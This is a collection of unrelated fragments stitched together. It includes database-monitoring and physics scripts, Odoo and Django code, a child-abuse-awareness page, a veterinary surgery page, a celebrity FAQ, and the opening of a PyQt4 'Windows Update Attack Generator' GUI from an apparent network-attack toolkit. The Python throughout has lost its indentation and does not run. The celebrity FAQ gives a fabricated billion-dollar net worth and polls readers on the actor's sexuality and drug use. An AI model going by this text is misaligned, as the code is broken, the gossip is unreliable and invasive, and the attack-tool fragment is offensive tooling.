sms_msg='['+level+'] '+db_type+'-'+tags+'-'+server+' '+message+' Time:'+create_time.strftime('%Y-%m-%d %H:%M:%S')
send_sms_type = func.get_option('smstype')
if send_sms_type == 'fetion':
result = sendsms_fx.send_sms(sms_to_list,sms_msg,db_type,tags,host,port,level,alarm_item,alarm_value,message)
else:
result = sendsms_api.send_sms(sms_to_list,sms_msg,db_type,tags,host,port,level,alarm_item,alarm_value,message)
if result:
send_sms_status=1
else:
send_sms_status=0
else:
send_sms_status=0
else:
send_sms_status=0
try:
sql="insert into alarm_history(server_id,tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,send_mail_status,send_sms_status) select server_id,tags,host,port,create_time,db_type,alarm_item,alarm_value,level,message,send_mail,send_mail_to_list,send_sms,send_sms_to_list,%s,%s from alarm where id=%s;"
param=(send_mail_status,send_sms_status,alarm_id)
func.mysql_exec(sql,param)
except Exception, e:
print e
func.mysql_exec("delete from alarm",'')
else:
pass
def check_send_alarm_sleep():
send_mail_sleep_time = func.get_option('send_mail_sleep_time')
send_sms_sleep_time = func.get_option('send_sms_sleep_time')
if send_mail_sleep_time:
now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
format="%Y-%m-%d %H:%M:%S"
send_mail_sleep_time_format = "%d" %(int(send_mail_sleep_time))
result=datetime.datetime(*time.strptime(now_time,format)[:6])-datetime.timedelta(minutes=int(send_mail_sleep_time_format))
sleep_alarm_time= result.strftime(format)
sql="delete from alarm_temp where alarm_type='mail' and create_time <= '%s' " %(sleep_alarm_time)
param=()
func.mysql_exec(sql,param)
if send_sms_sleep_time:
now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())
format="%Y-%m-%d %H:%M:%S"
send_sms_sleep_time_format = "%d" %(int(send_sms_sleep_time))
result=datetime.datetime(*time.strptime(now_time,format)[:6])-datetime.timedelta(minutes=int(send_sms_sleep_time_format))
sleep_alarm_time= result.strftime(format)
sql="delete from alarm_temp where alarm_type='sms' and create_time <= '%s' " %(sleep_alarm_time)
param=()
func.mysql_exec(sql,param)
def main():
logger.info("alarm controller started.")
check_send_alarm_sleep()
monitor_mysql = func.get_option('monitor_mysql')
monitor_mongodb = func.get_option('monitor_mongodb')
monitor_sqlserver = func.get_option('monitor_sqlserver')
monitor_oracle = func.get_option('monitor_oracle')
monitor_redis = func.get_option('monitor_redis')
monitor_os = func.get_option('monitor_os')
if monitor_mysql=="1":
get_alarm_mysql_status()
get_alarm_mysql_replcation()
if monitor_oracle=="1":
get_alarm_oracle_status()
get_alarm_oracle_tablespace()
get_alarm_oracle_diskgroup()
if monitor_sqlserver=="1":
get_alarm_sqlserver_status()
if monitor_mongodb=="1":
get_alarm_mongodb_status()
if monitor_redis=="1":
get_alarm_redis_status()
if monitor_os=="1":
get_alarm_os_status()
get_alarm_os_disk()
get_alarm_os_network()
send_alarm()
func.update_check_time()
logger.info("alarm controller finished.")
if __name__ == '__main__':
main()
|
April is Child Abuse Prevention Month. This month and throughout the year, Whittier Street Health Center encourages all individuals, families, and organizations to play a role in making Roxbury and the surrounding communities a better place for all children and families.
The principal types of maltreatment of children are neglect, physical abuse, emotional abuse, and sexual abuse.
Neglect is the failure of the parent or caretaker, either deliberately or through negligence or inability, to provide a child with minimally adequate food, shelter, clothing, supervision, medical care, emotional stability and growth, and other essential care. However, inadequate economic resources or the existence of a handicapping condition need to be considered.
Physical and emotional abuse is any action that creates an injury or substantial risk to a child. Physical abuse includes beating, shaking, kicking, burning, or other types of bodily harm that can result in bruises, fractured or broken bones, internal injuries, or death.
Sexual abuse occurs when an adult has any sexual contact with a child. Sexual exploitation and molestation are also considered abuse.
The rate of reported child abuse is higher in Massachusetts, at 53.8 per 1,000 children, compared to the national average in the United States of 46.1. In Massachusetts, the rates of reported abuse were higher among African-American (23.8) and Hispanic (21.8) children than their white counterparts (7.9). Children living in homes were domestic violence was present were also at a higher risk of child abuse (6.7 versus 2.2). Children with disabilities (intellectual disability, emotional disturbance, learning disability, physical disability, or behavioral problems) are also at higher risk for child abuse.
Whittier hosts a series of programs to raise awareness of Child Abuse Prevention Month. During the week of April 7 to 11, from 4:30 pm to 6:30 pm, the Whittier Youth Services Enrichment (WYSE) program held workshops on promoting safety and engagement in healthy, peaceful activities.
U.S. Department of Health and Human Services, Administration for Children and Families, Administration on Children, Youth and Families, Children’s Bureau. (2013). Child maltreatment 2012. Available from http://www.acf.hhs.gov/programs/cb/research-data-technology/statistics-research/child-maltreatment.
|
#
# Author: Henrique Pereira Coutada Miranda
# Run a IP calculation using yambo
#
from __future__ import print_function
import sys
from yambopy import *
from qepy import *
import argparse
#parse options
parser = argparse.ArgumentParser(description='Test the yambopy script.')
parser.add_argument('-dg','--doublegrid', action="store_true", help='Use double grid')
parser.add_argument('-c', '--calc', action="store_true", help='calculate the IP absorption')
parser.add_argument('-p', '--plot', action="store_true", help='plot the results')
args = parser.parse_args()
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
yambo = "yambo"
folder = 'ip'
#check if the SAVE folder is present
if not os.path.isdir('database/SAVE'):
print('preparing yambo database')
os.system('mkdir -p database')
os.system('cd nscf/bn.save; p2y > p2y.log')
os.system('cd nscf/bn.save; yambo > yambo.log')
os.system('mv nscf/bn.save/SAVE database')
if not os.path.isdir(folder):
os.mkdir(folder)
os.system('cp -r database/SAVE %s'%folder)
#initialize the double grid
if args.doublegrid:
print("creating double grid")
f = open('%s/ypp.in'%folder,'w')
f.write("""kpts_map
%DbGd_DB1_paths
"../database_double"
%""")
f.close()
os.system('cd %s; ypp'%folder)
if args.calc:
#create the yambo input file
y = YamboIn('yambo -o g -V all',folder=folder)
y['FFTGvecs'] = [30,'Ry']
y['BndsRnXs'] = [1,30]
y['QpntsRXd'] = [[1,1],'']
y['ETStpsXd'] = 500
y.write('%s/yambo_run.in'%folder)
print('running yambo')
os.system('cd %s; %s -F yambo_run.in -J yambo'%(folder,yambo))
if args.plot:
#pack in a json file
y = YamboOut(folder)
y.pack()
|
Anthology of Anfer(The Death Matches) focuses on the warrior women of Anfer and their contests...some for the entertainment of their sponsors...some in private...always to the death. This is the way the warrior women of Anfer live...they live for the thrill of combat against another woman. This issue contains four fight stories.
|
# Author(s): Silvio Gregorini (silviogregorini@openforce.it)
# Copyright 2019 Openforce Srls Unipersonale (www.openforce.it)
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from odoo import _, api, fields, models
from odoo.exceptions import ValidationError
from odoo.tools import float_compare, float_is_zero
class AssetDepreciation(models.Model):
_name = 'asset.depreciation'
_description = "Assets Depreciations"
amount_depreciable = fields.Monetary(
string="Depreciable Amount"
)
amount_depreciable_updated = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Updated Amount",
)
amount_depreciated = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Depreciated Amount",
)
amount_gain = fields.Monetary(
compute='_compute_amounts',
string="Capital Gain",
store=True,
)
amount_historical = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Historical Amount",
)
amount_in = fields.Monetary(
compute='_compute_amounts',
store=True,
string="In Amount",
)
amount_loss = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Capital Loss",
)
amount_out = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Out Amount",
)
amount_residual = fields.Monetary(
compute='_compute_amounts',
store=True,
string="Residual Amount",
)
asset_id = fields.Many2one(
'asset.asset',
ondelete='cascade',
readonly=True,
required=True,
string="Asset",
)
base_coeff = fields.Float(
default=1,
help="Coeff to compute amount depreciable from purchase amount",
string="Depreciable Base Coeff",
)
company_id = fields.Many2one(
'res.company',
readonly=True,
related='asset_id.company_id',
string="Company"
)
currency_id = fields.Many2one(
'res.currency',
readonly=True,
related='asset_id.currency_id',
string="Currency"
)
date_start = fields.Date(
string="Date Start"
)
dismiss_move_id = fields.Many2one(
'account.move',
string="Dismiss Move"
)
first_dep_nr = fields.Integer(
default=1,
string="First Dep. Num",
)
force_all_dep_nr = fields.Boolean(
string="Force All Dep. Num"
)
force_first_dep_nr = fields.Boolean(
string="Force First Dep. Num"
)
last_depreciation_date = fields.Date(
compute='_compute_last_depreciation_date',
store=True,
string="Last Dep.",
)
line_ids = fields.One2many(
'asset.depreciation.line',
'depreciation_id',
string="Lines"
)
mode_id = fields.Many2one(
'asset.depreciation.mode',
required=True,
string="Mode",
)
percentage = fields.Float(
string="Depreciation (%)"
)
pro_rata_temporis = fields.Boolean(
string="Pro-rata Temporis"
)
requires_account_move = fields.Boolean(
readonly=True,
related='type_id.requires_account_move',
string="Requires Account Move",
)
state = fields.Selection(
[('non_depreciated', "Non Depreciated"),
('partially_depreciated', "Partially Depreciated"),
('totally_depreciated', "Depreciated")],
compute='_compute_state',
default='non_depreciated',
store=True,
string="State"
)
type_id = fields.Many2one(
'asset.depreciation.type',
string="Depreciation Type"
)
zero_depreciation_until = fields.Date(
string="Zero Depreciation Up To"
)
@api.model
def create(self, vals):
dep = super().create(vals)
dep.normalize_first_dep_nr()
if dep.line_ids:
num_lines = dep.line_ids.filtered('requires_depreciation_nr')
if num_lines:
num_lines.normalize_depreciation_nr()
return dep
@api.multi
def write(self, vals):
res = super().write(vals)
need_norm = self.filtered(lambda d: d.need_normalize_first_dep_nr())
if need_norm:
need_norm.normalize_first_dep_nr(force=True)
for dep in self:
num_lines = dep.line_ids.filtered('requires_depreciation_nr')
if num_lines and num_lines.need_normalize_depreciation_nr():
num_lines.normalize_depreciation_nr(force=True)
return res
@api.multi
def unlink(self):
if self.mapped('line_ids'):
raise ValidationError(
_("Cannot delete depreciations if there is any depreciation"
" line linked to it.")
)
if any([m.state != 'draft' for m in self.mapped('dismiss_move_id')]):
deps = self.filtered(
lambda l: l.dismiss_move_id
and l.dismiss_move_id.state != 'draft'
)
name_list = "\n".join([l[-1] for l in deps.name_get()])
raise ValidationError(
_("Following lines are linked to posted account moves, and"
" cannot be deleted:\n{}").format(name_list)
)
return super().unlink()
@api.multi
def name_get(self):
return [(dep.id, dep.make_name()) for dep in self]
@api.multi
@api.depends(
'amount_depreciable', 'amount_depreciable_updated', 'amount_residual'
)
def _compute_state(self):
for dep in self:
dep.state = dep.get_depreciation_state()
@api.onchange('asset_id', 'base_coeff')
def onchange_base_coeff(self):
purchase_amount = self.asset_id.purchase_amount
self.amount_depreciable = self.base_coeff * purchase_amount
@api.onchange('first_dep_nr')
def onchange_normalize_first_dep_nr(self):
if self.first_dep_nr <= 0:
self.first_dep_nr = 1
@api.onchange('force_all_dep_nr')
def onchange_force_all_dep_nr(self):
if self.force_all_dep_nr:
self.first_dep_nr = 1
@api.onchange('force_first_dep_nr')
def onchange_force_first_dep_nr(self):
if self.force_first_dep_nr and self.first_dep_nr <= 0:
self.first_dep_nr = 1
@api.onchange('force_all_dep_nr', 'force_first_dep_nr')
def onchange_force_dep_nrs(self):
if self.force_all_dep_nr and self.force_first_dep_nr:
self.force_all_dep_nr = False
self.force_first_dep_nr = False
title = _("Warning!")
msg = _(
"Fields `Force All Dep. Num` and `Force First Dep. Num`"
" cannot be both active."
)
return {'warning': {'title': title, 'message': msg}}
if not self.force_all_dep_nr and self.force_first_dep_nr:
self.first_dep_nr = 1
@api.multi
@api.depends('amount_depreciable',
'line_ids.amount',
'line_ids.balance',
'line_ids.move_type',
'asset_id.sold')
def _compute_amounts(self):
for dep in self:
vals = dep.get_computed_amounts()
dep.update(vals)
@api.multi
@api.depends('line_ids', 'line_ids.date', 'line_ids.move_type')
def _compute_last_depreciation_date(self):
"""
Update date upon deps with at least one depreciation line (excluding
partial dismissal); else set field to False
"""
for dep in self:
dep_lines = dep.line_ids.filtered(
lambda l: l.move_type == 'depreciated'
and not l.partial_dismissal
)
if dep_lines:
dep.last_depreciation_date = max(dep_lines.mapped('date'))
else:
dep.last_depreciation_date = False
def check_before_generate_depreciation_lines(self, dep_date):
# Check if self is a valid recordset
if not self:
raise ValidationError(
_("Cannot create any depreciation according to current"
" settings.")
)
lines = self.mapped('line_ids')
# Check if any depreciation already has newer depreciation lines
# than the given date
newer_lines = lines.filtered(
lambda l: l.move_type == 'depreciated'
and not l.partial_dismissal
and l.date > dep_date
)
if newer_lines:
asset_names = ', '.join([
asset_name for asset_id, asset_name in
newer_lines.mapped('depreciation_id.asset_id').name_get()
])
raise ValidationError(
_("Cannot update the following assets which contain"
" newer depreciations for the chosen types:\n{}")
.format(asset_names)
)
posted_lines = lines.filtered(
lambda l: l.date == dep_date
and l.move_id
and l.move_id.state != 'draft'
)
if posted_lines:
posted_names = ', '.join([
asset_name for asset_id, asset_name in
posted_lines.mapped('depreciation_id.asset_id').name_get()
])
raise ValidationError(
_("Cannot update the following assets which contain"
" posted depreciation for the chosen date and types:\n{}")
.format(posted_names)
)
def generate_depreciation_lines(self, dep_date):
# Set new date within context if necessary
self.check_before_generate_depreciation_lines(dep_date)
new_lines = self.env['asset.depreciation.line']
for dep in self:
new_lines |= dep.generate_depreciation_lines_single(dep_date)
return new_lines
def generate_depreciation_lines_single(self, dep_date):
self.ensure_one()
dep_nr = self.get_max_depreciation_nr() + 1
dep = self.with_context(dep_nr=dep_nr, used_asset=self.asset_id.used)
dep_amount = dep.get_depreciation_amount(dep_date)
dep = dep.with_context(dep_amount=dep_amount)
vals = dep.prepare_depreciation_line_vals(dep_date)
return self.env['asset.depreciation.line'].create(vals)
def generate_dismiss_account_move(self):
self.ensure_one()
am_obj = self.env['account.move']
vals = self.get_dismiss_account_move_vals()
if 'line_ids' not in vals:
vals['line_ids'] = []
line_vals = self.get_dismiss_account_move_line_vals()
for v in line_vals:
vals['line_ids'].append((0, 0, v))
self.dismiss_move_id = am_obj.create(vals)
def get_computed_amounts(self):
self.ensure_one()
vals = {
'amount_{}'.format(k): abs(v)
for k, v in self.line_ids.get_balances_grouped().items()
if 'amount_{}'.format(k) in self._fields
}
if self.asset_id.sold:
vals.update({
'amount_depreciable_updated': 0,
'amount_residual': 0
})
else:
non_residual_types = self.line_ids.get_non_residual_move_types()
update_move_types = self.line_ids.get_update_move_types()
amt_dep = self.amount_depreciable
vals.update({
'amount_depreciable_updated': amt_dep + sum([
l.balance for l in self.line_ids
if l.move_type in update_move_types
]),
'amount_residual': amt_dep + sum([
l.balance for l in self.line_ids
if l.move_type not in non_residual_types
])
})
return vals
def get_depreciable_amount(self, dep_date=None):
types = self.line_ids.get_update_move_types()
return self.amount_depreciable + sum([
l.balance for l in self.line_ids
if l.move_type in types and (not dep_date or l.date <= dep_date)
])
def get_depreciation_amount(self, dep_date):
self.ensure_one()
zero_dep_date = self.zero_depreciation_until
if zero_dep_date and dep_date <= zero_dep_date:
return 0
# Get depreciable amount, multiplier and digits
amount = self.get_depreciable_amount(dep_date)
multiplier = self.get_depreciation_amount_multiplier(dep_date)
digits = self.env['decimal.precision'].precision_get('Account')
dep_amount = round(amount * multiplier, digits)
# If amount_residual < dep_amount: use amount_residual as dep_amount
if float_compare(self.amount_residual, dep_amount, digits) < 0:
dep_amount = self.amount_residual
return dep_amount
def get_depreciation_amount_multiplier(self, dep_date):
self.ensure_one()
# Base multiplier
multiplier = self.percentage / 100
# Update multiplier from depreciation mode data
multiplier *= self.mode_id.get_depreciation_amount_multiplier()
# Update multiplier from pro-rata temporis
date_start = self.date_start
if dep_date < date_start:
dt_start_str = fields.Date.from_string(date_start).strftime(
'%d-%m-%Y'
)
raise ValidationError(
_("Depreciations cannot start before {}.").format(dt_start_str)
)
if self.pro_rata_temporis or self._context.get('force_prorata'):
fiscal_year_obj = self.env['account.fiscal.year']
fy_start = fiscal_year_obj.get_fiscal_year_by_date(
date_start, company=self.company_id
)
fy_dep = fiscal_year_obj.get_fiscal_year_by_date(
dep_date, company=self.company_id
)
if fy_dep == fy_start:
# If current depreciation lies within the same fiscal year in
# which the asset was registered, compute multiplier as a
# difference from date_dep multiplier and start_date
# multiplier, plus 1/lapse to avoid "skipping" one day
fy_end = fields.Date.from_string(fy_dep.date_to)
fy_start = fields.Date.from_string(fy_dep.date_from)
lapse = (fy_end - fy_start).days + 1
dep_multiplier = self.get_pro_rata_temporis_multiplier(
dep_date, 'dte'
)
start_multiplier = self.get_pro_rata_temporis_multiplier(
self.date_start, 'dte'
)
multiplier *= start_multiplier - dep_multiplier + 1 / lapse
else:
# Otherwise, simply compute multiplier with respect to how
# many days have passed since the beginning of the fiscal year
multiplier *= self.get_pro_rata_temporis_multiplier(
dep_date, 'std'
)
return multiplier
def get_depreciation_state(self):
self.ensure_one()
digits = self.env['decimal.precision'].precision_get('Account')
depreciable = self.amount_depreciable
residual = self.amount_residual
updated = self.amount_depreciable_updated
if float_is_zero(depreciable, digits):
return 'non_depreciated'
elif float_is_zero(residual, digits):
return 'totally_depreciated'
elif float_compare(residual, updated, digits) < 0:
return 'partially_depreciated'
else:
return 'non_depreciated'
def get_dismiss_account_move_line_vals(self):
self.ensure_one()
credit_line_vals = {
'account_id': self.asset_id.category_id.asset_account_id.id,
'credit': self.amount_depreciated,
'debit': 0.0,
'currency_id': self.currency_id.id,
'name': _("Asset dismissal: ") + self.asset_id.make_name(),
}
debit_line_vals = {
'account_id': self.asset_id.category_id.fund_account_id.id,
'credit': 0.0,
'debit': self.amount_depreciated,
'currency_id': self.currency_id.id,
'name': _("Asset dismissal: ") + self.asset_id.make_name(),
}
return [credit_line_vals, debit_line_vals]
def get_dismiss_account_move_vals(self):
self.ensure_one()
return {
'company_id': self.company_id.id,
'date': self.asset_id.sale_date,
'journal_id': self.asset_id.category_id.journal_id.id,
'line_ids': [],
'ref': _("Asset dismissal: ") + self.asset_id.make_name(),
}
def get_max_depreciation_nr(self):
self.ensure_one()
num_lines = self.line_ids.filtered('requires_depreciation_nr')
nums = num_lines.mapped('depreciation_nr')
if not nums:
nums = [0]
return max(nums)
def get_pro_rata_temporis_dates(self, date):
"""
Gets useful dates for pro rata temporis computations, according to
given date, by retrieving its fiscal year.
:param date: given date for depreciation
:return: date objects triplet (dt_start, dt, dt_end)
- dt_start: fiscal year first day
- dt: given date
- dt_end: fiscal year last day
"""
if not date:
raise ValidationError(
_("Cannot compute pro rata temporis for unknown date.")
)
fiscal_year_obj = self.env['account.fiscal.year']
fiscal_year = fiscal_year_obj.get_fiscal_year_by_date(
date, company=self.company_id
)
if not fiscal_year:
date_str = fields.Date.from_string(date).strftime('%d/%m/%Y')
raise ValidationError(
_("No fiscal year defined for date {}") + date_str
)
return (
fields.Date.from_string(fiscal_year.date_from),
fields.Date.from_string(date),
fields.Date.from_string(fiscal_year.date_to)
)
def get_pro_rata_temporis_multiplier(self, date=None, mode='std'):
"""
Computes and returns pro rata temporis multiplier according to given
depreciation, date, fiscal year and mode
:param date: given date as a fields.Date string
:param mode: string, defines how to compute multiplier. Valid values:
- 'std': start-to-date, computes multiplier using days from fiscal
year's first day to given date;
- 'dte': date-to-end, computes multiplier using days from given
date to fiscal year's last day
"""
self.ensure_one()
if not (self.pro_rata_temporis or self._context.get('force_prorata')):
return 1
dt_start, dt, dt_end = self.get_pro_rata_temporis_dates(date)
lapse = (dt_end - dt_start).days + 1
if mode == 'std':
return ((dt - dt_start).days + 1) / lapse
elif mode == 'dte':
return ((dt_end - dt).days + 1) / lapse
elif mode:
raise NotImplementedError(
_("Cannot get pro rata temporis multiplier for mode `{}`")
.format(mode)
)
raise NotImplementedError(
_("Cannot get pro rata temporis multiplier for unspecified mode")
)
def make_name(self):
self.ensure_one()
return " - ".join((self.asset_id.make_name(), self.type_id.name or ""))
def need_normalize_first_dep_nr(self):
self.ensure_one()
if self.force_all_dep_nr:
return False
if self.force_first_dep_nr:
if self.first_dep_nr <= 0:
return True
else:
if self.first_dep_nr != 1:
return True
return False
def normalize_first_dep_nr(self, force=False):
"""
Normalize first numbered line according to `first_dep_nr` value
:param force: if True, force normalization
"""
force = force or self._context.get('force_normalize_first_dep_nr')
for d in self:
if force or d.need_normalize_first_dep_nr():
d.onchange_normalize_first_dep_nr()
def post_generate_depreciation_lines(self, lines=None):
lines = lines or self.env['asset.depreciation.line']
lines.filtered('requires_account_move').button_generate_account_move()
def prepare_depreciation_line_vals(self, dep_date):
self.ensure_one()
if dep_date is None:
raise ValidationError(
_("Cannot create a depreciation line without a date")
)
dep_amount = self._context.get('dep_amount') or 0.0
dep_year = fields.Date.from_string(dep_date).year
return {
'amount': dep_amount,
'date': dep_date,
'depreciation_id': self.id,
'move_type': 'depreciated',
'name': _("{} - Depreciation").format(dep_year)
}
|
John Francis Daley FAQs 2019- Facts, Rumors and the latest Gossip.
John Francis Daley FAQs: Facts, Rumors, Birthdate, Net Worth, Sexual Orientation and much more!
Who is John Francis Daley? Biography, gossip, facts?
John Francis Daley (born July 20 1985) is an American television and film actor and screenwriter sometimes credited as John Daley or John Francis Daly. He is best known for playing Sam Weir on the NBC comedy-drama Freaks and Geeks and his current role as Dr. Lance Sweets on the series Bones. He plays keyboards and sings for the band Dayplayer.
How does John Francis Daley look like? How did John Francis Daley look like young?
This is how John Francis Daley looks like. The photo hopefully gives you an impression of John Francis Daley's look, life and work.
When is John Francis Daley's birthday?
John Francis Daley was born on the 20th of July 1985 , which was a Saturday. John Francis Daley will be turning 34 in only 91 days from today.
How old is John Francis Daley?
John Francis Daley is 33 years old. To be more precise (and nerdy), the current age as of right now is 12075 days or (even more geeky) 289800 hours. That's a lot of hours!
Are there any books, DVDs or other memorabilia of John Francis Daley? Is there a John Francis Daley action figure?
We would think so. You can find a collection of items related to John Francis Daley right here.
What is John Francis Daley's zodiac sign and horoscope?
John Francis Daley's zodiac sign is Cancer.
The ruling planet of Cancer is the Moon. Therefore, lucky days are Tuesdays and lucky numbers are: 9, 18, 27, 36, 45, 54, 63 and 72. Orange, Lemon and Yellow are John Francis Daley's lucky colors. Typical positive character traits of Cancer include: Good Communication Skills, Gregariousness, Diplomacy, Vivacity and Enthusiasm. Negative character traits could be: Prevarication, Instability, Indecision and Laziness.
Is John Francis Daley gay or straight?
Many people enjoy sharing rumors about the sexuality and sexual orientation of celebrities. We don't know for a fact whether John Francis Daley is gay, bisexual or straight. However, feel free to tell us what you think! Vote by clicking below.
67% of all voters think that John Francis Daley is gay (homosexual), 22% voted for straight (heterosexual), and 11% like to think that John Francis Daley is actually bisexual.
Is John Francis Daley still alive? Are there any death rumors?
Yes, as far as we know, John Francis Daley is still alive. We don't have any current information about John Francis Daley's health. However, being younger than 50, we hope that everything is ok.
Are there any photos of John Francis Daley's hairstyle or shirtless?
Where was John Francis Daley born?
John Francis Daley was born in United States, Wheeling Illinois.
Is John Francis Daley hot or not?
Well, that is up to you to decide! Click the "HOT"-Button if you think that John Francis Daley is hot, or click "NOT" if you don't think so.
81% of all voters think that John Francis Daley is hot, 19% voted for "Not Hot".
What is John Francis Daley's birth name?
John Francis Daley's birth name is John Francis Daley.
Do you have a photo of John Francis Daley?
There you go. This is a photo of John Francis Daley or something related.
When did John Francis Daley's career start? How long ago was that?
John Francis Daley's career started in 1999. That is more than 20 years ago.
Does John Francis Daley do drugs? Does John Francis Daley smoke cigarettes or weed?
It is no secret that many celebrities have been caught with illegal drugs in the past. Some even openly admit their drug usuage. Do you think that John Francis Daley does smoke cigarettes, weed or marijuhana? Or does John Francis Daley do steroids, coke or even stronger drugs such as heroin? Tell us your opinion below.
19% of the voters think that John Francis Daley does do drugs regularly, 44% assume that John Francis Daley does take drugs recreationally and 38% are convinced that John Francis Daley has never tried drugs before.
Who are similar persons to John Francis Daley?
Dilshad Akhtar, Gregory C. Case, Joy Chambers, Simon Degge and Kalinda Vazquez are persons that are similar to John Francis Daley. Click on their names to check out their FAQs.
What is John Francis Daley doing now?
Supposedly, 2019 has been a busy year for John Francis Daley. However, we do not have any detailed information on what John Francis Daley is doing these days. Maybe you know more. Feel free to add the latest news, gossip, official contact information such as mangement phone number, cell phone number or email address, and your questions below.
What is John Francis Daley's net worth in 2019? How much does John Francis Daley earn?
According to various sources, John Francis Daley's net worth has grown significantly in 2019. However, the numbers vary depending on the source. If you have current knowledge about John Francis Daley's net worth, please feel free to share the information below.
John Francis Daley's net worth is estimated to be in the range of approximately $1120499148 in 2019, according to the users of vipfaq. The estimated net worth includes stocks, properties, and luxury goods such as yachts and private airplanes.
|
from django.db import models
class Blueprint(models.Model):
name = models.CharField(max_length=30)
class MineBlueprint(models.Model):
name = models.CharField(max_length=30, unique=True)
max_output_rate = models.FloatField()
output = models.IntegerField()
max_capacity = models.FloatField()
def __str__(self):
return self.name
class FactoryBlueprint(models.Model):
name = models.CharField(max_length=30, unique=True)
max_output_rate = models.FloatField()
output = models.IntegerField()
max_capacity = models.FloatField()
def __str__(self):
return self.name
class ResourceType(models.Model):
name = models.CharField(max_length=30, unique=True)
requirements = models.ForeignKey('Resources', blank=True, null=True)
def __str__(self):
return self.name
class Mine(models.Model):
name = models.CharField(max_length=30, unique=True)
all_resources = models.ForeignKey('Resources')
coordinates = models.ForeignKey('Coordinates')
blueprint = models.IntegerField()
production_level = models.FloatField()
def __str__(self):
return self.name
class Coordinates(models.Model):
x = models.FloatField()
y = models.FloatField()
class Resource(models.Model):
amount = models.FloatField()
resource_type = models.ForeignKey('ResourceType')
class Resources(models.Model):
all_resources = models.ManyToManyField('Resource')
|
When a feline family member is due to undergo surgery, it is natural for owners to be concerned. Even if it’s just a routine spay or neuter, the procedure still involves the use of anesthesia and a period of recovery. That’s why it’s important to place your trust in confident hands.
The sole focus of Dr. Dunkle and the staff of Exclusively Cats is to provide the best possible care to our patients. We understand their unique health needs and work carefully to ensure that when a surgical procedure is necessary, it is conducted with the utmost safety and care.
We have experience performing a wide range of feline surgical procedures. These range from spay and neuter procedures, feline dental cleanings, biopsies, and mass removals to abdominal exploratories, bladder stone removals, mastectomies, and more.
When you bring your cat to our veterinary hospital for a procedure, we follow a series of steps to ensure the best possible outcome. Prior to surgery, your kitty will undergo a physical exam and age-appropriate blood work screening. We will be checking to see if there are any pre-existing conditions that might put your cat at risk.
On admission, our staff will take an extensive history to confirm that your cat is not showing any new symptoms of disease. Our veterinarian will review your cat’s blood test results and listen to the heart and lungs, checking for murmurs or congestion, plus check for a decline in body condition or other abnormalities that occurred since your cat’s last physical. Rest assured that our veterinarian and staff will always put your kitty’s health needs first when determining whether a surgery should proceed.
After the pre-op evaluation, your cat will receive pain medication and other medications as is appropriate for the procedure being performed that day. Our compassionate and skilled veterinary nursing staff will be carefully monitoring your cat’s heart and respiration rates, body temperature, mucous membrane color, and overall anesthesia depth from induction of anesthesia to recovery. The surgical nurse is in constant “hands on” and “stethoscope on” contact with your cat during the entire surgery. Even during pre- and post-operative periods, the doctor is never more than a few feet away.
Once we have completed the surgery, we will settle your feline into our intensive care unit and do all that is needed to ensure a safe recovery. We will then call you with an update and arrange for your cat’s discharge. Many surgeries are outpatient, but on occasion your cat may need to stay with us overnight to aid healing. At the discharge meeting, we will carefully review with you any post-surgery instructions that are necessary for caring for your feline friend at home.
We are committed to providing top-quality care to our patients. In addition to being active members of the American Association of Feline Practitioners, Dr. Dunkle and the entire veterinary staff continually study the latest updates and developments in feline surgical medicine.
Please contact us to ask any surgical questions you may have or to learn more.
“ She and her staff are always accessible and truly care about the cats entrusted to them. We are so glad to have found such a wonderful practice. ” — Wanda R.
Monday: 8:30 a.m. – 6 p.m.
Tuesday: 8:30 a.m. – 6 p.m.
Wednesday: 2 p.m. – 8 p.m.
Thursday: 1 p.m. – 7 p.m.
Friday: 8:30 a.m. – 12 p.m.
Saturday: 8:30 a.m. – 12 p.m.
The materials offered on this website are intended for educational purposes only. Exclusively Cats Veterinary Hospital does not provide veterinary medical services or guidance via the Internet. Please consult your pets' veterinarian in matters regarding the care of your animals.
Copyright © 2016 Exclusively Cats Veterinary Hospital. All rights reserved.
|
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from os import getcwd,popen,chdir,walk,path,remove,stat,getuid
from Modules.DHCPstarvation import frm_dhcp_Attack,conf_etter
from platform import linux_distribution
from Core.Settings import frm_Settings
from re import search
import threading
from shutil import copyfile
class frm_update_attack(QMainWindow):
def __init__(self, parent=None):
super(frm_update_attack, self).__init__(parent)
self.form_widget = frm_WinSoftUp(self)
self.setCentralWidget(self.form_widget)
self.setWindowTitle("Windows Update Attack Generator ")
self.setWindowIcon(QIcon('rsc/icon.ico'))
self.config = frm_Settings()
self.loadtheme(self.config.XmlThemeSelected())
def loadtheme(self,theme):
if theme != "theme2":
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
else:
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
class frm_WinSoftUp(QWidget):
def __init__(self, parent=None):
super(frm_WinSoftUp, self).__init__(parent)
self.Main = QVBoxLayout()
self.control = None
self.module2 = frm_dhcp_Attack()
self.path_file = None
self.owd = getcwd()
self.GUI()
def GUI(self):
self.form = QFormLayout(self)
self.grid = QGridLayout(self)
self.grid1 = QGridLayout(self)
self.path = QLineEdit(self)
self.logBox = QListWidget(self)
self.path.setFixedWidth(400)
#combobox
self.cb_interface = QComboBox(self)
self.refresh_interface(self.cb_interface)
#label
self.lb_interface = QLabel("Network Adapter:")
# buttons
self.btn_open = QPushButton("...")
self.btn_start = QPushButton("Start DNS",self)
self.btn_stop = QPushButton("Stop",self)
self.btn_reload = QPushButton("refresh",self)
self.btn_start_server = QPushButton("Start Server",self)
# size
self.btn_open.setMaximumWidth(90)
self.btn_start.setFixedHeight(50)
self.btn_stop.setFixedHeight(50)
self.btn_start_server.setFixedHeight(50)
#icons
self.btn_start.setIcon(QIcon("rsc/start.png"))
self.btn_open.setIcon(QIcon("rsc/open.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.btn_reload.setIcon(QIcon("rsc/refresh.png"))
